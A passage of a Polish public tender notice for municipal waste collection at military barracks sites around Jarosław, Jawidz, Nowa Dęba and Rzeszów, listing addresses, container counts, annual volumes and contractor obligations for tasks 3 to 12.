<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3:   rejon Wojskowej Administracji Koszar  Jarosław, 4 punkty odbioru, (szac. ilość odpadów: 550 m3).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 3 obejmuje wywóz odpadów komunalnych z rejonu Wojskowej Administracji Koszar Jarosław w ilości    550 m3/rok, 4 punkty odbioru.

1.
1.	Miejsce wykonywania usługi		ul. 3-go Maja 80, 37-500 Jarosław
2.	Ilość i rodzaj pojemników:	Do podstawienia: 7 pojemników 1100L (1,1 m3) lub pojemniki innego rodzaju w ilości odpowiadającej pojemności ww. wymienionym.
3.	Szacunkowa ilość odpadów w skali 1 roku	475 m3
4.	Pojemniki na segregowane odpady komunalne (szkło, plastik, papier)	1 komplet
2.
1.	Miejsce wykonywania usługi		WKU, ul. 3 Maja 67, 37-500 Jarosław
2.	Ilość i rodzaj pojemników:	Do podstawienia: 1 pojemnik 1100L (1,1 m3) lub pojemniki innego rodzaju w ilości odpowiadającej pojemności ww. wymienionemu.
3.	Szacunkowa ilość odpadów w skali 1 roku	25 m3 
4.	Pojemniki na segregowane odpady komunalne (szkło, plastik, papier)	1 komplet
3.
1.	Miejsce wykonywania usługi		ul. Poniatowskiego 49a, 37-500 Jarosław
2.	Ilość i rodzaj pojemników:	Do podstawienia: 1 pojemnik 1100L (1,1 m3) lub pojemniki innego rodzaju w ilości odpowiadającej pojemności ww. wymienionemu.
3.	Szacunkowa ilość odpadów w skali 1 roku	25 m3
4.	Pojemniki na segregowane odpady komunalne (szkło, plastik, papier)	1 komplet
4.
1.	Miejsce wykonywania usługi		ul. Grunwaldzka 9, 37-500 Jarosław
2.	Ilość i rodzaj pojemników:	Do podstawienia: 1 pojemnik 1100L (1,1 m3) lub pojemniki innego rodzaju w ilości odpowiadającej pojemności ww. wymienionemu.
3.	Szacunkowa ilość odpadów w skali 1 roku	25 m3
4.	Pojemniki na segregowane odpady komunalne (szkło, plastik, papier)	1 komplet

W zadaniu nr 3 wykonawca zobowiązuje się do:
1.	wyposażenia posesji w sprawne pojemniki ze szczelnymi pokrywami, do gromadzenia stałych odpadów komunalnych, pojemniki będą własnością Wykonawcy, 
2.	podstawienia pojemników do segregacji (zbiórki surowców wtórnych), pojemniki będą własnością Wykonawcy, 
3.	pojemniki o których mowa w punkcie 1 i 2 zostaną ustawione w miejscach wskazanych przez użytkownika - przedstawiciela Zamawiającego,
4.	systematycznego usuwania odpadów gromadzonych we wszystkich pojemnikach, zgodnie z przyjętymi w umowie ustaleniami.
5.	usunięcia odpadów zalegających poza pojemnikami w przypadku ich przepełnienia spowodowanego niedotrzymaniem ustalonego terminu wywozu,
6.	wymiany podstawionych pojemników uszkodzonych lub zniszczonych w wyniku bieżącej eksploatacji,
7.	utrzymywania podstawionych pojemników w czystości, zgodnie z ustaleniami zawartymi w umowie,
8.	wystawiania pojemników z odpadami oraz ich wstawiania po opróżnieniu
9.	składowania odpadów na wyznaczonym do tego celu składowisku odpadów lub przekazanie do unieszkodliwienia,
10.	udostępniania w razie potrzeby dodatkowych pojemników i opróżniania ich wg cen zgodnych z zawartą umową.
11.	w dniu podpisania umowy przedstawi wykaz pracowników oraz sprzętu, przewidzianych do bezpośredniego wykonania czynności wynikających z zamówienia,
12.	każdorazowe wykonanie usługi odbywać się będzie na zgłoszenie telefoniczne uprawnionego przedstawiciela obsługiwanego kompleksu Zamawiającego - termin wykonania usługi nie później niż 24 godziny od zgłoszenia.

Przewiduje się, że ilość gromadzonych odpadów z  segregacji stanowi ok. 15% wszystkich odpadów komunalnych.

Podane ilości przedmiotu zamówienia są ilościami szacunkowymi. Rozliczane będą faktycznie wywiezione m3 nieczystości..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr 4:   rejon Wojskowej Administracji Koszar  Jawidz,  1 punkt odbioru, (szac. ilość odpadów: 90 m3).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 4 obejmuje wywóz odpadów komunalnych z rejonu Wojskowej Administracji Koszar Jawidz w ilości   90 m3/rok, 1 punkt odbioru.

1.
1.	Miejsce wykonywania usługi		Jawidz, 21-052 Niemce
2.	Ilość i rodzaj pojemników:	Do podstawienia: 17 pojemników 1100L (1,1 m3) lub pojemniki innego rodzaju w ilości odpowiadającej pojemności ww. wymienionym.
3.	Szacunkowa ilość odpadów w skali 1 roku	90 m3
4.	Pojemniki na segregowane odpady komunalne (szkło, plastik, papier)	1 komplet

W zadaniu nr 4 wykonawca zobowiązuje się do:
1.	wyposażenia posesji w sprawne pojemniki ze szczelnymi pokrywami, do gromadzenia stałych odpadów komunalnych, pojemniki będą własnością Wykonawcy, 
2.	podstawienia pojemników do segregacji (zbiórki surowców wtórnych), pojemniki będą własnością Wykonawcy, 
3.	pojemniki o których mowa w punkcie 1 i 2 zostaną ustawione w miejscach wskazanych przez użytkownika - przedstawiciela Zamawiającego,
4.	systematycznego usuwania odpadów gromadzonych we wszystkich pojemnikach, zgodnie z przyjętymi w umowie ustaleniami.
5.	usunięcia odpadów zalegających poza pojemnikami w przypadku ich przepełnienia spowodowanego niedotrzymaniem ustalonego terminu wywozu,
6.	wymiany podstawionych pojemników uszkodzonych lub zniszczonych w wyniku bieżącej eksploatacji,
7.	utrzymywania podstawionych pojemników w czystości, zgodnie z ustaleniami zawartymi w umowie,
8.	wystawiania pojemników z odpadami oraz ich wstawiania po opróżnieniu
9.	składowania odpadów na wyznaczonym do tego celu składowisku odpadów lub przekazanie do unieszkodliwienia,
10.	udostępniania w razie potrzeby dodatkowych pojemników i opróżniania ich wg cen zgodnych z zawartą umową.
11.	w dniu podpisania umowy przedstawi wykaz pracowników oraz sprzętu, przewidzianych do bezpośredniego wykonania czynności wynikających z zamówienia,
12.	każdorazowe wykonanie usługi odbywać się będzie na zgłoszenie telefoniczne uprawnionego przedstawiciela obsługiwanego kompleksu Zamawiającego - termin wykonania usługi do 2 dni od daty zgłoszenia.

Przewiduje się, że ilość gromadzonych odpadów z  segregacji stanowi ok. 15% wszystkich odpadów komunalnych.

Podane ilości przedmiotu zamówienia są ilościami szacunkowymi. Rozliczane będą faktycznie wywiezione m3 nieczystości..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie nr 5:   rejon Wojskowej Administracji Koszar  Jawidz, 1 punkt odbioru,(szac. ilość odpadów: 80 m3).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 5 obejmuje wywóz odpadów komunalnych z rejonu Wojskowej Administracji Koszar Jawidz w ilości    80  m3/rok, 1 punkt odbioru.

1.
1.	Miejsce wykonywania usługi		Bezwola, 21-310 Wohyń
2.	Ilość i rodzaj pojemników:	Do podstawienia: 3 pojemniki 1100L (1,1 m3) lub pojemniki innego rodzaju w ilości odpowiadającej pojemności ww. wymienionemu. 
3.	Szacunkowa ilość odpadów w skali 1 roku	80 m3
4.	Pojemniki na segregowane odpady komunalne (szkło, plastik, papier)	1 komplet


W zadaniu nr 5 wykonawca zobowiązuje się do:
1.	wyposażenia posesji w sprawne pojemniki ze szczelnymi pokrywami, do gromadzenia stałych odpadów komunalnych, pojemniki będą własnością Wykonawcy, 
2.	podstawienia pojemników do segregacji (zbiórki surowców wtórnych), pojemniki będą własnością Wykonawcy, 
3.	pojemniki o których mowa w punkcie 1 i 2 zostaną ustawione w miejscach wskazanych przez użytkownika - przedstawiciela Zamawiającego,
4.	systematycznego usuwania odpadów gromadzonych we wszystkich pojemnikach, zgodnie z przyjętymi w umowie ustaleniami.
5.	usunięcia odpadów zalegających poza pojemnikami w przypadku ich przepełnienia spowodowanego niedotrzymaniem ustalonego terminu wywozu,
6.	wymiany podstawionych pojemników uszkodzonych lub zniszczonych w wyniku bieżącej eksploatacji,
7.	utrzymywania podstawionych pojemników w czystości, zgodnie z ustaleniami zawartymi w umowie,
8.	wystawiania pojemników z odpadami oraz ich wstawiania po opróżnieniu
9.	składowania odpadów na wyznaczonym do tego celu składowisku odpadów lub przekazanie do unieszkodliwienia,
10.	udostępniania w razie potrzeby dodatkowych pojemników i opróżniania ich wg cen zgodnych z zawartą umową.
11.	w dniu podpisania umowy przedstawi wykaz pracowników oraz sprzętu, przewidzianych do bezpośredniego wykonania czynności wynikających z zamówienia,
12.	każdorazowe wykonanie usługi odbywać się będzie na zgłoszenie telefoniczne uprawnionego przedstawiciela obsługiwanego kompleksu Zamawiającego - termin wykonania usługi nie później niż 24 godziny od zgłoszenia.

Przewiduje się, że ilość gromadzonych odpadów z  segregacji stanowi ok. 15% wszystkich odpadów komunalnych.

Podane ilości przedmiotu zamówienia są ilościami szacunkowymi. Rozliczane będą faktycznie wywiezione m3 nieczystości..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie nr 6:   rejon Wojskowej Administracji Koszar  Jawidz, 2 punkty odbioru,(szac. ilość odpadów: 110 m3).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 6 obejmuje wywóz odpadów komunalnych z rejonu Wojskowej Administracji Koszar Jawidz w ilości    110 m3/rok, 2 punkty odbioru.

1.
1.	Miejsce wykonywania usługi		ul. Lubelska 159, 23-210 Kraśnik
2.	Ilość i rodzaj pojemników:	Do podstawienia: 2 pojemniki 1100L (1,1 m3) lub pojemniki innego rodzaju w ilości odpowiadającej pojemności ww. wymienionemu. 
3.	Szacunkowa ilość odpadów w skali 1 roku	70 m3
4.	Pojemniki na segregowane odpady komunalne (szkło, plastik, papier)	1 komplet



2.
1.	Miejsce wykonywania usługi		ul. Kolejowa 24, 23-210 Kraśnik
2.	Ilość i rodzaj pojemników:	Do podstawienia: 2 pojemniki 1100L (1,1 m3) lub pojemniki innego rodzaju w ilości odpowiadającej pojemności ww. wymienionemu. 
3.	Szacunkowa ilość odpadów w skali 1 roku	40 m3
4.	Pojemniki na segregowane odpady komunalne (szkło, plastik, papier)	1 komplet
W zadaniu nr 6 wykonawca zobowiązuje się do:
1.	wyposażenia posesji w sprawne pojemniki ze szczelnymi pokrywami, do gromadzenia stałych odpadów komunalnych, pojemniki będą własnością Wykonawcy, 
2.	podstawienia pojemników do segregacji (zbiórki surowców wtórnych), pojemniki będą własnością Wykonawcy, 
3.	pojemniki o których mowa w punkcie 1 i 2 zostaną ustawione w miejscach wskazanych przez użytkownika - przedstawiciela Zamawiającego,
4.	systematycznego usuwania odpadów gromadzonych we wszystkich pojemnikach, zgodnie z przyjętymi w umowie ustaleniami.
5.	usunięcia odpadów zalegających poza pojemnikami w przypadku ich przepełnienia spowodowanego niedotrzymaniem ustalonego terminu wywozu,
6.	wymiany podstawionych pojemników uszkodzonych lub zniszczonych w wyniku bieżącej eksploatacji,
7.	utrzymywania podstawionych pojemników w czystości, zgodnie z ustaleniami zawartymi w umowie,
8.	wystawiania pojemników z odpadami oraz ich wstawiania po opróżnieniu
9.	składowania odpadów na wyznaczonym do tego celu składowisku odpadów lub przekazanie do unieszkodliwienia,
10.	udostępniania w razie potrzeby dodatkowych pojemników i opróżniania ich wg cen zgodnych z zawartą umową.
11.	w dniu podpisania umowy przedstawi wykaz pracowników oraz sprzętu, przewidzianych do bezpośredniego wykonania czynności wynikających z zamówienia,
12.	każdorazowe wykonanie usługi odbywać się będzie na zgłoszenie telefoniczne uprawnionego przedstawiciela obsługiwanego kompleksu Zamawiającego - termin wykonania usługi nie później niż 24 godziny od zgłoszenia.

Przewiduje się, że ilość gromadzonych odpadów z  segregacji stanowi ok. 15% wszystkich odpadów komunalnych.

Podane ilości przedmiotu zamówienia są ilościami szacunkowymi. Rozliczane będą faktycznie wywiezione m3 nieczystości..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie nr 7:   rejon Wojskowej Administracji Koszar  Jawidz, 3 punkty odbioru, (szac. ilość odpadów: 180 m3).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 7 obejmuje wywóz odpadów komunalnych z rejonu Wojskowej Administracji Koszar Jawidz w ilości   180 m3/rok, 3 punkty odbioru.


1.
1.	Miejsce wykonywania usługi		WKU, al. 1000-lecia 28, 21-500 Biała Podlaska
2.	Ilość  i rodzaj pojemników:	Do podstawienia: 1 pojemnik 1100L (1,1 m3) lub pojemniki innego rodzaju w ilości odpowiadającej pojemności ww. wymienionemu.
3.	Szacunkowa ilość odpadów w skali 1 roku	21 m3
4.	Pojemniki na segregowane odpady komunalne (szkło, plastik, papier)	1 komplet
2.
1.	Miejsce wykonywania usługi		Roskosz, 21-500 Biała Podlaska
2.	Ilość i rodzaj pojemników:	Do podstawienia: 2 pojemniki 800L (0,8 m3) i 1 pojemnik KP-7 (7 m3) lub pojemniki innego rodzaju w ilości odpowiadającej pojemności ww. wymienionym.
3.	Szacunkowa ilość odpadów w skali 1 roku	114 m3
4.	Pojemniki na segregowane odpady komunalne (szkło, plastik, papier)	1 komplet
3.
1.	Miejsce wykonywania usługi		ul. Dokudowska 12, 17, 211, 21-500 Biała Podlaska
2.	Ilość i rodzaj pojemników:	Do podstawienia: 3 pojemniki 1100L (1,1 m3) lub pojemniki innego rodzaju w ilości odpowiadającej pojemności ww. wymienionym.
3.	Szacunkowa ilość odpadów w skali 1 roku	45 m3
4.	Pojemniki na segregowane odpady komunalne (szkło, plastik, papier)	1 komplet

W zadaniu nr 7 wykonawca zobowiązuje się do:
1.	wyposażenia posesji w sprawne pojemniki ze szczelnymi pokrywami, do gromadzenia stałych odpadów komunalnych, pojemniki będą własnością Wykonawcy, 
2.	podstawienia pojemników do segregacji (zbiórki surowców wtórnych), pojemniki będą własnością Wykonawcy, 
3.	pojemniki o których mowa w punkcie 1 i 2 zostaną ustawione w miejscach wskazanych przez użytkownika - przedstawiciela Zamawiającego,
4.	systematycznego usuwania odpadów gromadzonych we wszystkich pojemnikach, zgodnie z przyjętymi w umowie ustaleniami.
5.	usunięcia odpadów zalegających poza pojemnikami w przypadku ich przepełnienia spowodowanego niedotrzymaniem ustalonego terminu wywozu,
6.	wymiany podstawionych pojemników uszkodzonych lub zniszczonych w wyniku bieżącej eksploatacji,
7.	utrzymywania podstawionych pojemników w czystości, zgodnie z ustaleniami zawartymi w umowie,
8.	wystawiania pojemników z odpadami oraz ich wstawiania po opróżnieniu
9.	składowania odpadów na wyznaczonym do tego celu składowisku odpadów lub przekazanie do unieszkodliwienia,
10.	udostępniania w razie potrzeby dodatkowych pojemników i opróżniania ich wg cen zgodnych z zawartą umową.
11.	w dniu podpisania umowy przedstawi wykaz pracowników oraz sprzętu, przewidzianych do bezpośredniego wykonania czynności wynikających z zamówienia,
12.	każdorazowe wykonanie usługi odbywać się będzie na zgłoszenie telefoniczne uprawnionego przedstawiciela obsługiwanego kompleksu Zamawiającego - termin wykonania usługi nie później niż 24 godziny od zgłoszenia.


Przewiduje się, że ilość gromadzonych odpadów z  segregacji stanowi ok. 15% wszystkich odpadów komunalnych.

Podane ilości przedmiotu zamówienia są ilościami szacunkowymi. Rozliczane będą faktycznie wywiezione m3 nieczystości..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie nr 8:   rejon Wojskowej Administracji Koszar  Nowa Dęba, 4 punkty odbioru, (szac. ilość odpadów: 1900 m3).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 8 obejmuje wywóz odpadów komunalnych z rejonu Wojskowej Administracji Koszar Nowa Dęba, w ilości   1900 m3/rok, 4 punkty odbioru.

1.  
1.	Miejsce wykonywania usługi		ul. Anieli Krzywoń 1, 39-460 Nowa Dęba
2.	Ilość i rodzaj pojemników:	W posiadaniu: 1 pojemnik KP-7 (7 m3) 
Do podstawienia: 1 pojemnik 1100L (1,1 m3)  lub pojemniki innego rodzaju w ilości odpowiadającej pojemności ww. wymienionym. 
3.	Szacunkowa ilość odpadów w skali 1 roku	120 m3
4.	Pojemniki na segregowane odpady komunalne (szkło, plastik, papier)	1 komplet

2.
1.	Miejsce wykonywania usługi		 ul. Anieli Krzywoń 1, 39-460 Nowa Dęba
2.	Ilość i rodzaj pojemników:	Do podstawienia: 1 pojemnik 1100L  (1,1 m3) lub pojemniki innego rodzaju w ilości odpowiadającej pojemności ww. wymienionym.
3.	Szacunkowa ilość odpadów w skali 1 roku	30 m3
4.	Pojemniki na segregowane odpady komunalne (szkło, plastik, papier)	1 komplet

3.
1.	Miejsce wykonywania usługi		ul. Anieli Krzywoń 1, 39-460 Nowa Dęba
2.	Ilość i rodzaj pojemników:	W posiadaniu: 4 pojemniki KP-7 (7 m3), 
Do podstawienia: 8 pojemników 1100L (1,1 m3) lub pojemniki innego rodzaju w ilości odpowiadającej pojemności ww. wymienionym. 
3.	Szacunkowa ilość odpadów w skali 1 roku	500 m3
4.	Pojemniki na segregowane odpady komunalne (szkło, plastik, papier)	2 komplety


4.
1.	Miejsce wykonywania usługi		 (poligon) ul. Anieli Krzywoń 1, 39-460 Nowa Dęba
2.	Ilość i rodzaj pojemników:	W posiadaniu: 13 pojemników KP-7 (7 m3).
Do podstawienia: 8 pojemników 1100L (1,1 m3) lub pojemniki innego rodzaju w ilości odpowiadającej pojemności ww. wymienionym. 
3.	Szacunkowa ilość odpadów w skali 1 roku	1250 m3
4.	Pojemniki na segregowane odpady komunalne (szkło, plastik, papier)	9 kompletów

W zadaniu nr 8 wykonawca zobowiązuje się do:
1.	wyposażenia posesji w sprawne pojemniki ze szczelnymi pokrywami, do gromadzenia stałych odpadów komunalnych, pojemniki będą własnością Wykonawcy, 
2.	podstawienia pojemników do segregacji (zbiórki surowców wtórnych), pojemniki będą własnością Wykonawcy, 
3.	pojemniki o których mowa w punkcie 1 i 2 zostaną ustawione w miejscach wskazanych przez użytkownika - przedstawiciela Zamawiającego,
4.	systematycznego usuwania odpadów gromadzonych we wszystkich pojemnikach, zgodnie z przyjętymi w umowie ustaleniami,
5.	usunięcia odpadów zalegających poza pojemnikami w przypadku ich przepełnienia spowodowanego niedotrzymaniem ustalonego terminu wywozu,
6.	wymiany podstawionych pojemników uszkodzonych lub zniszczonych w wyniku bieżącej eksploatacji,
7.	utrzymywania podstawionych pojemników w czystości, zgodnie z ustaleniami zawartymi w umowie,
8.	wystawiania pojemników z odpadami oraz ich wstawiania po opróżnieniu,
9.	składowania odpadów na wyznaczonym do tego celu składowisku odpadów lub przekazanie do unieszkodliwienia,
10.	udostępniania w razie potrzeby dodatkowych pojemników i opróżniania ich wg cen zgodnych z zawartą umową,
11.	w dniu podpisania umowy przedstawi wykaz pracowników oraz sprzętu, przewidzianych do bezpośredniego wykonania czynności wynikających z zamówienia,
12.	każdorazowe wykonanie usługi odbywać się będzie na zgłoszenie telefoniczne uprawnionego przedstawiciela obsługiwanego kompleksu Zamawiającego - termin wykonania usługi nie później niż 24 godziny od zgłoszenia.

Przewiduje się, że ilość gromadzonych odpadów z segregacji stanowi ok. 15% wszystkich odpadów komunalnych.

Podane ilości przedmiotu zamówienia są ilościami szacunkowymi. Rozliczane będą faktycznie wywiezione m3 nieczystości..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie nr 9:   rejon Wojskowej Administracji Koszar  Nowa Dęba, 1 punkt odbioru, (szac. ilość odpadów: 150 m3).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 9 obejmuje wywóz odpadów komunalnych z rejonu Wojskowej Administracji Koszar Nowa Dęba, w ilości 150 m3/rok, 1 punkt odbioru.

1.
1.	Miejsce wykonywania usługi		Lipa, 37-470 Lipa, gm. Zaklików
2.	Ilość i rodzaj pojemników:	W posiadaniu: 2 pojemniki KP-7 (7 m3)  
3.	Szacunkowa ilość odpadów w skali 1 roku	150 m3
4.	Pojemniki na segregowane odpady komunalne (szkło, plastik, papier)	1 komplet


W zadaniu nr 9 wykonawca zobowiązuje się do:
1.	podstawienia pojemników do segregacji (zbiórki surowców wtórnych), pojemniki będą własnością Wykonawcy, 
2.	pojemniki o których mowa w punkcie 1 zostaną ustawione w miejscach wskazanych przez użytkownika - przedstawiciela Zamawiającego,
3.	systematycznego usuwania odpadów gromadzonych we wszystkich pojemnikach, zgodnie z przyjętymi w umowie ustaleniami.
4.	usunięcia odpadów zalegających poza pojemnikami w przypadku ich przepełnienia spowodowanego niedotrzymaniem ustalonego terminu wywozu,
5.	wymiany podstawionych pojemników uszkodzonych lub zniszczonych w wyniku bieżącej eksploatacji,
6.	utrzymywania podstawionych pojemników w czystości, zgodnie z ustaleniami zawartymi w umowie,
7.	wystawiania pojemników z odpadami oraz ich wstawiania po opróżnieniu
8.	składowania odpadów na wyznaczonym do tego celu składowisku odpadów lub przekazanie do unieszkodliwienia,
9.	udostępniania w razie potrzeby dodatkowych pojemników i opróżniania ich wg cen zgodnych z zawartą umową.
10.	w dniu podpisania umowy przedstawi wykaz pracowników oraz sprzętu, przewidzianych do bezpośredniego wykonania czynności wynikających z zamówienia,
11.	każdorazowe wykonanie usługi odbywać się będzie na zgłoszenie telefoniczne uprawnionego przedstawiciela obsługiwanego kompleksu Zamawiającego - termin wykonania usługi nie później niż 24 godziny od zgłoszenia.

Przewiduje się, że ilość gromadzonych odpadów z segregacji stanowi ok. 15% wszystkich odpadów komunalnych.

Podane ilości przedmiotu zamówienia są ilościami szacunkowymi. Rozliczane będą faktycznie wywiezione m3 nieczystości..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zadanie nr 10: rejon Wojskowej Administracji Koszar  Nowa Dęba, 1 punkt odbioru, (szac. ilość odpadów: 30 m3).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 10 obejmuje wywóz odpadów komunalnych z rejonu Wojskowej Administracji Koszar Nowa Dęba, w ilości  30 m3/rok, 1 punkt odbioru (w trakcie ćwiczeń). 



1.
1.	Miejsce wykonywania usługi		Radomyśl n. Sanem, gm Radomyśl
2.	Ilość i rodzaj pojemników:	W posiadaniu: 1 pojemnik KP-7 (7 m3)  
3.	Szacunkowa ilość odpadów w skali 1 roku	30 m3
4.	Pojemniki na segregowane odpady komunalne (szkło, plastik, papier)	
1 komplet


W zadaniu nr 10 wykonawca zobowiązuje się do:
1.	podstawienia pojemników do segregacji (zbiórki surowców wtórnych), pojemniki będą własnością Wykonawcy, 
2.	pojemniki o których mowa w punkcie 1 zostaną ustawione w miejscach wskazanych przez użytkownika - przedstawiciela Zamawiającego,
3.	systematycznego usuwania odpadów gromadzonych we wszystkich pojemnikach, zgodnie z przyjętymi w umowie ustaleniami.
4.	usunięcia odpadów zalegających poza pojemnikami w przypadku ich przepełnienia spowodowanego niedotrzymaniem ustalonego terminu wywozu,
5.	wymiany podstawionych pojemników uszkodzonych lub zniszczonych w wyniku bieżącej eksploatacji,
6.	utrzymywania podstawionych pojemników w czystości, zgodnie z ustaleniami zawartymi w umowie,
7.	wystawiania pojemników z odpadami oraz ich wstawiania po opróżnieniu
8.	składowania odpadów na wyznaczonym do tego celu składowisku odpadów lub przekazanie do unieszkodliwienia,
9.	udostępniania w razie potrzeby dodatkowych pojemników i opróżniania ich wg cen zgodnych z zawartą umową.
10.	w dniu podpisania umowy przedstawi wykaz pracowników oraz sprzętu, przewidzianych do bezpośredniego wykonania czynności wynikających z zamówienia,
11.	każdorazowe wykonanie usługi odbywać się będzie na zgłoszenie telefoniczne uprawnionego przedstawiciela obsługiwanego kompleksu Zamawiającego - termin wykonania usługi nie później niż 24 godziny od zgłoszenia.

Przewiduje się, że ilość gromadzonych odpadów z segregacji stanowi ok. 15% wszystkich odpadów komunalnych.

Podane ilości przedmiotu zamówienia są ilościami szacunkowymi. Rozliczane będą faktycznie wywiezione m3 nieczystości..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zadanie nr 11: rejon Wojskowej Administracji Koszar  Rzeszów, 1 punkt odbioru, (szac. ilość odpadów: 60 m3).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 11 obejmuje wywóz odpadów komunalnych z rejonu Wojskowej Administracji Koszar Rzeszów, w ilości    60 m3/rok, 1 punkt odbioru.


1.
1.	Miejsce wykonywania usługi		Wysoka Głogowska, 36-060 Wysoka Głogowska
2.	Ilość i rodzaj pojemników:	Do podstawienia: 3 pojemniki 1100L (1,1 m3) lub pojemniki innego rodzaju w ilości odpowiadającej pojemności ww. wymienionym.
3.	Szacunkowa ilość odpadów w skali 1 roku	60 m3
4.	Pojemniki na segregowane odpady komunalne (szkło, plastik, papier)	1 komplet

W zadaniu nr 11 wykonawca zobowiązuje się do:
1.	wyposażenia posesji w sprawne pojemniki ze szczelnymi pokrywami, do gromadzenia stałych odpadów komunalnych, pojemniki będą własnością Wykonawcy, 
2.	podstawienia pojemników do segregacji (zbiórki surowców wtórnych), pojemniki będą własnością Wykonawcy, 
3.	pojemniki o których mowa w punkcie 1 i 2 zostaną ustawione w miejscach wskazanych przez użytkownika - przedstawiciela Zamawiającego,
4.	systematycznego usuwania odpadów gromadzonych we wszystkich pojemnikach, zgodnie z przyjętymi w umowie ustaleniami.
5.	usunięcia odpadów zalegających poza pojemnikami w przypadku ich przepełnienia spowodowanego niedotrzymaniem ustalonego terminu wywozu,
6.	wymiany podstawionych pojemników uszkodzonych lub zniszczonych w wyniku bieżącej eksploatacji,
7.	utrzymywania podstawionych pojemników w czystości, zgodnie z ustaleniami zawartymi w umowie,
8.	wystawiania pojemników z odpadami oraz ich wstawiania po opróżnieniu
9.	składowania odpadów na wyznaczonym do tego celu składowisku odpadów lub przekazanie do unieszkodliwienia,
10.	udostępniania w razie potrzeby dodatkowych pojemników i opróżniania ich wg cen zgodnych z zawartą umową.
11.	w dniu podpisania umowy przedstawi wykaz pracowników oraz sprzętu, przewidzianych do bezpośredniego wykonania czynności wynikających z zamówienia,
12.	każdorazowe wykonanie usługi odbywać się będzie na zgłoszenie telefoniczne uprawnionego przedstawiciela obsługiwanego kompleksu Zamawiającego - termin wykonania usługi nie później niż 24 godziny od zgłoszenia.

Przewiduje się, że ilość gromadzonych odpadów z  segregacji stanowi ok. 15% wszystkich odpadów komunalnych.

Podane ilości przedmiotu zamówienia są ilościami szacunkowymi. Rozliczane będą faktycznie wywiezione m3 nieczystości..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zadanie nr 12: rejon Wojskowej Administracji Koszar  Rzeszów,  1 punkt odbioru, (szac. ilość odpadów w : 15 m3.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 12 obejmuje wywóz odpadów komunalnych z rejonu Wojskowej Administracji Koszar Rzeszów, w ilości   15 m3/rok, 1 punkt odbioru.


1.
1.	Miejsce wykonywania usługi		ul. Legionów 25, 39-300 Mielec
2.	Ilość i rodzaj pojemników:	Do podstawienia: 2 pojemniki 120L (0,12 m3) lub pojemniki innego rodzaju w ilości odpowiadającej pojemności ww. wymienionym.
3.	Szacunkowa ilość odpadów w skali 1 roku	15 m3
